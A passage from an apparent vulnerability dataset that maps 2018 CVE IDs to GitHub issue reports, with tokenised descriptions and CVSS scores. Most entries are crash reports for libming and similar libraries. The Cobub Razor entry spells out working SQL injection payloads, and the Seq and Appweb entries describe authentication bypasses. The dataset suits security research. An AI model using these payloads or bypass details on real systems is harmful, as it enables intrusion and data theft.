  32474. "exploitabilityScore": 1.8
  32475. },
  32476. {
  32477. "CVE_ID": "CVE-2018-7866",
  32478. "Issue_Url_old": "https://github.com/libming/libming/issues/118",
  32479. "Issue_Url_new": "https://github.com/libming/libming/issues/118",
  32480. "Repo_new": "libming/libming",
  32481. "Issue_Created_At": "2018-03-07T08:42:15Z",
  32482. "description": "Null pointer dereference vulnerability in APITAG APITAG . Hi, i found a null pointer dereference bug in the libming NUMBERTAG It crashed in function APITAG details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32483. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32484. "severity": "MEDIUM",
  32485. "baseScore": 6.5,
  32486. "impactScore": 3.6,
  32487. "exploitabilityScore": 2.8
  32488. },
  32489. {
  32490. "CVE_ID": "CVE-2018-7867",
  32491. "Issue_Url_old": "https://github.com/libming/libming/issues/116",
  32492. "Issue_Url_new": "https://github.com/libming/libming/issues/116",
  32493. "Repo_new": "libming/libming",
  32494. "Issue_Created_At": "2018-03-07T08:21:57Z",
  32495. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32496. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32497. "severity": "MEDIUM",
  32498. "baseScore": 6.5,
  32499. "impactScore": 3.6,
  32500. "exploitabilityScore": 2.8
  32501. },
  32502. {
  32503. "CVE_ID": "CVE-2018-7868",
  32504. "Issue_Url_old": "https://github.com/libming/libming/issues/113",
  32505. "Issue_Url_new": "https://github.com/libming/libming/issues/113",
  32506. "Repo_new": "libming/libming",
  32507. "Issue_Created_At": "2018-03-07T07:50:29Z",
  32508. "description": "heap buffer overflow in APITAG . Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32509. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32510. "severity": "MEDIUM",
  32511. "baseScore": 6.5,
  32512. "impactScore": 3.6,
  32513. "exploitabilityScore": 2.8
  32514. },
  32515. {
  32516. "CVE_ID": "CVE-2018-7869",
  32517. "Issue_Url_old": "https://github.com/libming/libming/issues/119",
  32518. "Issue_Url_new": "https://github.com/libming/libming/issues/119",
  32519. "Repo_new": "libming/libming",
  32520. "Issue_Created_At": "2018-03-07T09:01:56Z",
  32521. "description": "There are a lot of memory leaks in libming NUMBERTAG which is trigged in dcinit(in APITAG ./swftoc NUMBERTAG mem leaks swf /dev/null FILETAG vim FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG fe8e in dcinit PATHTAG NUMBERTAG ebf2 in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in realloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG fd6b in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in realloc ( PATHTAG NUMBERTAG d NUMBERTAG d in APITAG PATHTAG NUMBERTAG fd6b in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f NUMBERTAG in push PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG e7b8 in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG b NUMBERTAG e in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG eccd in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e 
in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) ...... ...... POC FILE: URLTAG",
  32522. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  32523. "severity": "HIGH",
  32524. "baseScore": 7.5,
  32525. "impactScore": 3.6,
  32526. "exploitabilityScore": 3.9
  32527. },
  32528. {
  32529. "CVE_ID": "CVE-2018-7870",
  32530. "Issue_Url_old": "https://github.com/libming/libming/issues/117",
  32531. "Issue_Url_new": "https://github.com/libming/libming/issues/117",
  32532. "Repo_new": "libming/libming",
  32533. "Issue_Created_At": "2018-03-07T08:29:46Z",
  32534. "description": "Invalid memory address dereference in APITAG (in APITAG Hi, i found an issue in the libming NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32535. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32536. "severity": "MEDIUM",
  32537. "baseScore": 6.5,
  32538. "impactScore": 3.6,
  32539. "exploitabilityScore": 2.8
  32540. },
  32541. {
  32542. "CVE_ID": "CVE-2018-7871",
  32543. "Issue_Url_old": "https://github.com/libming/libming/issues/120",
  32544. "Issue_Url_new": "https://github.com/libming/libming/issues/120",
  32545. "Repo_new": "libming/libming",
  32546. "Issue_Created_At": "2018-03-07T09:12:13Z",
  32547. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32548. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32549. "severity": "HIGH",
  32550. "baseScore": 8.8,
  32551. "impactScore": 5.9,
  32552. "exploitabilityScore": 2.8
  32553. },
  32554. {
  32555. "CVE_ID": "CVE-2018-7872",
  32556. "Issue_Url_old": "https://github.com/libming/libming/issues/114",
  32557. "Issue_Url_new": "https://github.com/libming/libming/issues/114",
  32558. "Repo_new": "libming/libming",
  32559. "Issue_Created_At": "2018-03-07T08:03:05Z",
  32560. "description": "Invalid memory address dereference in APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function APITAG details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32561. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32562. "severity": "MEDIUM",
  32563. "baseScore": 6.5,
  32564. "impactScore": 3.6,
  32565. "exploitabilityScore": 2.8
  32566. },
  32567. {
  32568. "CVE_ID": "CVE-2018-7873",
  32569. "Issue_Url_old": "https://github.com/libming/libming/issues/111",
  32570. "Issue_Url_new": "https://github.com/libming/libming/issues/111",
  32571. "Repo_new": "libming/libming",
  32572. "Issue_Created_At": "2018-03-07T07:37:59Z",
  32573. "description": "heap buffer overflow in function APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32575. "severity": "MEDIUM",
  32576. "baseScore": 6.5,
  32577. "impactScore": 3.6,
  32578. "exploitabilityScore": 2.8
  32579. },
  32580. {
  32581. "CVE_ID": "CVE-2018-7874",
  32582. "Issue_Url_old": "https://github.com/libming/libming/issues/115",
  32583. "Issue_Url_new": "https://github.com/libming/libming/issues/115",
  32584. "Repo_new": "libming/libming",
  32585. "Issue_Created_At": "2018-03-07T08:11:56Z",
  32586. "description": "Invalid memory address dereference in strlenext (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function strlenext .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32587. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32588. "severity": "MEDIUM",
  32589. "baseScore": 6.5,
  32590. "impactScore": 3.6,
  32591. "exploitabilityScore": 2.8
  32592. },
  32593. {
  32594. "CVE_ID": "CVE-2018-7875",
  32595. "Issue_Url_old": "https://github.com/libming/libming/issues/112",
  32596. "Issue_Url_new": "https://github.com/libming/libming/issues/112",
  32597. "Repo_new": "libming/libming",
  32598. "Issue_Created_At": "2018-03-07T07:44:35Z",
  32599. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32600. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32601. "severity": "MEDIUM",
  32602. "baseScore": 6.5,
  32603. "impactScore": 3.6,
  32604. "exploitabilityScore": 2.8
  32605. },
  32606. {
  32607. "CVE_ID": "CVE-2018-7876",
  32608. "Issue_Url_old": "https://github.com/libming/libming/issues/109",
  32609. "Issue_Url_new": "https://github.com/libming/libming/issues/109",
  32610. "Repo_new": "libming/libming",
  32611. "Issue_Created_At": "2018-03-07T07:15:31Z",
  32612. "description": "memory exhaustion in APITAG Version: APITAG libming NUMBERTAG latest version) A memory exhaustion vulnerability was found in function APITAG which allows attackers to cause a denial of service via a crafted file. ERRORTAG POC FILE: URLTAG",
  32613. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32614. "severity": "MEDIUM",
  32615. "baseScore": 6.5,
  32616. "impactScore": 3.6,
  32617. "exploitabilityScore": 2.8
  32618. },
  32619. {
  32620. "CVE_ID": "CVE-2018-7877",
  32621. "Issue_Url_old": "https://github.com/libming/libming/issues/110",
  32622. "Issue_Url_new": "https://github.com/libming/libming/issues/110",
  32623. "Repo_new": "libming/libming",
  32624. "Issue_Created_At": "2018-03-07T07:28:31Z",
  32625. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN) ERRORTAG POC FILE: URLTAG",
  32626. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32627. "severity": "MEDIUM",
  32628. "baseScore": 6.5,
  32629. "impactScore": 3.6,
  32630. "exploitabilityScore": 2.8
  32631. },
  32632. {
  32633. "CVE_ID": "CVE-2018-7998",
  32634. "Issue_Url_old": "https://github.com/jcupitt/libvips/issues/893",
  32635. "Issue_Url_new": "https://github.com/jcupitt/libvips/issues/893",
  32636. "Repo_new": "jcupitt/libvips",
  32637. "Issue_Created_At": "2018-03-05T03:39:48Z",
  32638. "description": "NULL APITAG function pointer dereference vulnerability in APITAG NUMBERTAG Description In libvips NUMBERTAG and the master branch, A null function pointer dereference vulnerability was found in region.c, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted image file NUMBERTAG Reproduce This issue can be reproduced by the following command: vips im_copy $POC FILETAG NUMBERTAG Cause Analyze Backtrack is as flow: CODETAG The source code of APITAG ERRORTAG From gdb, we can see that the programe fails to check the function pointer in line NUMBERTAG which results in a segmentation fault: CODETAG FILETAG",
  32639. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32640. "severity": "HIGH",
  32641. "baseScore": 7.5,
  32642. "impactScore": 5.9,
  32643. "exploitabilityScore": 1.6
  32644. },
  32645. {
  32646. "CVE_ID": "CVE-2018-7999",
  32647. "Issue_Url_old": "https://github.com/silnrsi/graphite/issues/22",
  32648. "Issue_Url_new": "https://github.com/silnrsi/graphite/issues/22",
  32649. "Repo_new": "silnrsi/graphite",
  32650. "Issue_Created_At": "2018-03-05T10:02:56Z",
  32651. "description": "null pointer dereference vulnerability in APITAG NUMBERTAG Description A null pointer dereference vulnerability was found in APITAG which may allow attackers to cause a denial of service or possibly have unspecified other impact via a crafted font type file NUMBERTAG How to reproduce The issue can be reproduced by the following command: APITAG NUMBERTAG Cause Analyze The program failed to verify pointer m_silf in APITAG CODETAG FILETAG",
  32652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32653. "severity": "HIGH",
  32654. "baseScore": 8.8,
  32655. "impactScore": 5.9,
  32656. "exploitabilityScore": 2.8
  32657. },
  32658. {
  32659. "CVE_ID": "CVE-2018-8048",
  32660. "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/144",
  32661. "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/144",
  32662. "Repo_new": "flavorjones/loofah",
  32663. "Issue_Created_At": "2018-03-15T14:52:43Z",
  32664. "description": "placeholder issue.",
  32665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32666. "severity": "MEDIUM",
  32667. "baseScore": 6.1,
  32668. "impactScore": 2.7,
  32669. "exploitabilityScore": 2.8
  32670. },
  32671. {
  32672. "CVE_ID": "CVE-2018-8056",
  32673. "Issue_Url_old": "https://github.com/cobub/razor/issues/162",
  32674. "Issue_Url_new": "https://github.com/cobub/razor/issues/162",
  32675. "Repo_new": "cobub/razor",
  32676. "Issue_Created_At": "2018-03-10T16:58:30Z",
  32677. "description": "Some vulnerability in Cobub Razor NUMBERTAG SQL injection Code source: PATHTAG at line NUMBERTAG The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection APITAG could result in full information disclosure. The SQL injection type: error based and AND/OR time based blind Parameter: channel_name,platform APITAG string is also applied to 'platform' at the same time NUMBERTAG channel_name=test\" AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG b NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG NUMBERTAG channel_name=test\" AND SLEEP NUMBERTAG APITAG NUMBERTAG physical path Leakage The pages leaked the absolute path: URL: FILETAG URLTAG APITAG",
  32678. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  32679. "severity": "HIGH",
  32680. "baseScore": 7.5,
  32681. "impactScore": 3.6,
  32682. "exploitabilityScore": 3.9
  32683. },
  32684. {
  32685. "CVE_ID": "CVE-2018-8096",
  32686. "Issue_Url_old": "https://github.com/datalust/seq-tickets/issues/675",
  32687. "Issue_Url_new": "https://github.com/datalust/seq-tickets/issues/675",
  32688. "Repo_new": "datalust/seq-tickets",
  32689. "Issue_Created_At": "2018-03-12T22:08:19Z",
  32690. "description": "Authentication bypass in builds up to and including NUMBERTAG A critical issue has been reported affecting versions of Seq up to and including NUMBERTAG This application logic error permits a user with access to the HTTP API gain full access to the Seq server. Seq servers with authentication enabled need to be upgraded to the latest Seq release available at URLTAG Customers without active support/maintenance should contact EMAILTAG for information regarding a down level patch. Timeline NUMBERTAG On February NUMBERTAG th NUMBERTAG we were notified privately of the existence of the bug NUMBERTAG We immediately verified the issue and evaluated options for mitigation; having determined that a low risk fix was possible, we commenced work on a new version to resolve the issue NUMBERTAG Within NUMBERTAG hours of the report we emailed customers and active trial users with information about the bug and availability of the fixed release; we also produced and included a down level patch for customers running unsupported/legacy versions NUMBERTAG To allow for upgrades to take place, a minimum NUMBERTAG day window was provided before raising this publicly visible report _In the interests of our customers, Datalust will not confirm or disclose security issues until an investigation has been completed and patches or mitigations are available._ Details Authentication and authorization are separate in the NUMBERTAG Seq security model. Unauthenticated requests are allowed access to various assets required for correctly displaying the APITAG page; further authorization is bypassed when allowed unauthenticated requests are processed. Among these assets are a group of four system settings including authentication options and some details of the authentication provider. A missing check for the HTTP PUT method inadvertently enabled write access to these settings, through which the authentication provider can be modified or disabled. 
Impact By disabling authentication, an attacker may gain admin access to the Seq web application. Through the plug in \"app\" mechanism, this can be used to execute code on the Seq server with the capabilities/access level of the APITAG process. The bug cannot be used to read user passwords, which for basic authentication are stored by Seq as salted PBKDF2 hashes. The bug is not exploitable through a port locked down as ingestion only, i.e. using the APITAG configuration setting. Patch availability The bug is fixed in Seq versions NUMBERTAG onwards. All users with a supported Seq license relying on authentication should update immediately to the most recent Seq NUMBERTAG ersion (version FILETAG at the time of writing. Users without current support/maintenance can access a patch for earlier versions by contacting EMAILTAG . Postmortem We have identified two main factors that enabled this bug to remain undetected: Programmatic security configuration: the endpoints in question do appear to perform correct security checks, however because the responsibility for implementing this was spread between several unrelated blocks of code, the override was not obvious to inspection A test blindspot covering code added very early in product development: the settings mechanism was added very early in product development, at a time when integration test coverage was low; as testing has matured along with the rest of the product, some older code remained with low test coverage As a result, a new, declarative security model has been implemented for Seq NUMBERTAG This provides a basis for more precise test coverage, and also produces auditable documentation directly from the API security configuration. 
We have also undertaken a further review of Seq NUMBERTAG Additional test coverage has been added, and in versions from NUMBERTAG onwards we took the additional step of centralizing a public URL/method white list to improve auditability and reduce the likelihood of re introducing this kind of issue in later code changes. We're sorry for any inconvenience caused by this bug and would like to reiterate our commitment to producing the most secure Seq possible, and our dedication to handling security issues in a responsible and timely manner. Customers with questions or concerns may contact EMAILTAG for assistance. Datalust is grateful to Daniel Chactoura of APITAG for identifying and privately disclosing this issue.",
  32691. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32692. "severity": "CRITICAL",
  32693. "baseScore": 9.8,
  32694. "impactScore": 5.9,
  32695. "exploitabilityScore": 3.9
  32696. },
  32697. {
  32698. "CVE_ID": "CVE-2018-8097",
  32699. "Issue_Url_old": "https://github.com/pyeve/eve/issues/1101",
  32700. "Issue_Url_new": "https://github.com/pyeve/eve/issues/1101",
  32701. "Repo_new": "pyeve/eve",
  32702. "Issue_Created_At": "2018-01-14T11:42:00Z",
  32703. "description": "Where can I report security vulnerability?. Hi, I found a potential vulnerability in the latest version of Eve. Is there any security related email I can send my report? Thanks :)",
  32704. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32705. "severity": "CRITICAL",
  32706. "baseScore": 9.8,
  32707. "impactScore": 5.9,
  32708. "exploitabilityScore": 3.9
  32709. },
  32710. {
  32711. "CVE_ID": "CVE-2018-8715",
  32712. "Issue_Url_old": "https://github.com/embedthis/appweb/issues/610",
  32713. "Issue_Url_new": "https://github.com/embedthis/appweb/issues/610",
  32714. "Repo_new": "embedthis/appweb",
  32715. "Issue_Created_At": "2018-03-12T02:11:40Z",
  32716. "description": "Basic/digest bypass with null password. Overview A security vulnerability affecting Appweb versions up to and including NUMBERTAG with a specially crafted WWW Authenticate header has been identified. This bulletin discusses this flaw and its implications. Summary A HTTP request with specially crafted, invalid WWW Authenticate header field with a missing password and known username will bypass the password check. Sites using basic or digest authentication may be impacted. Sites using web based forms for authentication will not be impacted. Description The WWW Authenticate header supplies the username and password for authentication of the request. If an invalid WWW Authenticate header is used with a known, valid username and without supplying a password, the request will bypass authentication and be accepted. The exploit requires: A site supporting browser based basic and digest authentication. Sites using web based forms for username and password are not impacted. A specially crafted WWW Authenticate is required with a missing password field. An empty password will not suffice. A valid user name must be supplied. Note: Browsers cannot initiate an exploit via normal web pages. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity High. An attacker could bypass authentication. Remedy Apply the quick patch below to Appweb NUMBERTAG to NUMBERTAG Alternatively, upgrade to Appweb NUMBERTAG when it is released. Appweb NUMBERTAG is highly compatible with Appweb NUMBERTAG and upgrading should be relatively straightforward. Quick Patch ERRORTAG Thanks This issue was discovered by security researcher, Davide Quarta ( APITAG and Truel IT, has reported this vulnerability to Beyond Security\u2019s APITAG Secure Disclosure program. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  32717. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32718. "severity": "HIGH",
  32719. "baseScore": 8.1,
  32720. "impactScore": 5.9,
  32721. "exploitabilityScore": 2.2
  32722. },
  32723. {
  32724. "CVE_ID": "CVE-2018-8717",
  32725. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/419",
  32726. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/419",
  32727. "Repo_new": "joyplus/joyplus-cms",
  32728. "Issue_Created_At": "2018-03-14T08:19:20Z",
  32729. "description": "\u7f51\u7ad9\u5b58\u5728csrf. joyplus cms\u7528\u6237\u7ba1\u7406\u6dfb\u52a0\u5904\u5b58\u5728csrf\u6f0f\u6d1e\u3002 paylod\uff1a CODETAG FILETAG",
  32730. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32731. "severity": "HIGH",
  32732. "baseScore": 8.8,
  32733. "impactScore": 5.9,
  32734. "exploitabilityScore": 2.8
  32735. },
  32736. {
  32737. "CVE_ID": "CVE-2018-8766",
  32738. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/421",
  32739. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/421",
  32740. "Repo_new": "joyplus/joyplus-cms",
  32741. "Issue_Created_At": "2018-03-16T04:00:29Z",
  32742. "description": "joyplus cms NUMBERTAG has File upload results in getshell. joyplus cms NUMBERTAG has File upload results in getshell url: APITAG FILETAG FILETAG",
  32743. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32744. "severity": "CRITICAL",
  32745. "baseScore": 9.8,
  32746. "impactScore": 5.9,
  32747. "exploitabilityScore": 3.9
  32748. },
  32749. {
  32750. "CVE_ID": "CVE-2018-8767",
  32751. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/420",
  32752. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/420",
  32753. "Repo_new": "joyplus/joyplus-cms",
  32754. "Issue_Created_At": "2018-03-16T03:45:39Z",
  32755. "description": "joyplus cms NUMBERTAG has Cross Site Scripting. joyplus cms NUMBERTAG has Cross Site Scripting: payload\uff1a CODETAG FILETAG",
  32756. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32757. "severity": "MEDIUM",
  32758. "baseScore": 4.8,
  32759. "impactScore": 2.7,
  32760. "exploitabilityScore": 1.7
  32761. },
  32762. {
  32763. "CVE_ID": "CVE-2018-8804",
  32764. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1025",
  32765. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1025",
  32766. "Repo_new": "imagemagick/imagemagick",
  32767. "Issue_Created_At": "2018-03-15T05:43:27Z",
  32768. "description": "double free. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw tiff webp x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
  32769. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32770. "severity": "HIGH",
  32771. "baseScore": 8.8,
  32772. "impactScore": 5.9,
  32773. "exploitabilityScore": 2.8
  32774. },
  32775. {
  32776. "CVE_ID": "CVE-2018-8806",
  32777. "Issue_Url_old": "https://github.com/libming/libming/issues/128",
  32778. "Issue_Url_new": "https://github.com/libming/libming/issues/128",
  32779. "Repo_new": "libming/libming",
  32780. "Issue_Created_At": "2018-03-18T18:01:55Z",
  32781. "description": "heap use after free in APITAG (decompile.c). On latest version of libming, there is a heap use after free in APITAG function of decompile.c, which could be triggered by the POC below. To reproduce the issue, run: PATHTAG $POC POC could be downloaded at: FILETAG OUTPUT: header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG NUMBERTAG SWF_DOACTION / APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffec NUMBERTAG d0 sp NUMBERTAG ffec NUMBERTAG c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a8dbfc NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
  32782. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32783. "severity": "MEDIUM",
  32784. "baseScore": 6.5,
  32785. "impactScore": 3.6,
  32786. "exploitabilityScore": 2.8
  32787. },
  32788. {
  32789. "CVE_ID": "CVE-2018-8807",
  32790. "Issue_Url_old": "https://github.com/libming/libming/issues/129",
  32791. "Issue_Url_new": "https://github.com/libming/libming/issues/129",
  32792. "Repo_new": "libming/libming",
  32793. "Issue_Created_At": "2018-03-18T18:28:57Z",
  32794. "description": "heap use after free in APITAG (decompile.c). On latest version of libming, there is a heap use after free in function APITAG of decompile.c, which could be triggered by the POC below. To reproduce the issue, run: PATHTAG $POC POC could be downloaded at: FILETAG OUTPUT: PATHTAG PATHTAG header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG NUMBERTAG Note: APITAG and/or APITAG are not NUMBERTAG SWF_DOACTION / APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffe NUMBERTAG b NUMBERTAG sp NUMBERTAG ffe NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG ee in APITAG PATHTAG NUMBERTAG e6 in APITAG PATHTAG NUMBERTAG e6 in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG fd2c9a NUMBERTAG c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
  32795. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32796. "severity": "MEDIUM",
  32797. "baseScore": 6.5,
  32798. "impactScore": 3.6,
  32799. "exploitabilityScore": 2.8
  32800. },
  32801. {
  32802. "CVE_ID": "CVE-2018-8808",
  32803. "Issue_Url_old": "https://github.com/radare/radare2/issues/9725",
  32804. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9725",
  32805. "Repo_new": "radareorg/radare2",
  32806. "Issue_Created_At": "2018-03-19T17:43:50Z",
  32807. "description": "heap buffer overflow in r_asm_disassemble APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Dalvik dex Architecture/bits of the file: Arm/dex version NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: APITAG build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 A $POC NUMBERTAG the POC is attached: The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG bfc1 at pc NUMBERTAG f NUMBERTAG da7b NUMBERTAG bp NUMBERTAG ffd NUMBERTAG e NUMBERTAG sp NUMBERTAG ffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG bfc1 thread T NUMBERTAG f NUMBERTAG da7b NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG de in r_asm_disassemble FILETAG PATHTAG NUMBERTAG f NUMBERTAG d5a4b NUMBERTAG in r_core_anal_op PATHTAG NUMBERTAG f NUMBERTAG d5b NUMBERTAG b5 in fcn_callconv PATHTAG NUMBERTAG f NUMBERTAG d5b NUMBERTAG b5 in r_core_anal_all PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG e2ab in cmd_anal_all PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG in cmd_anal PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG d8 in r_cmd_call PATHTAG 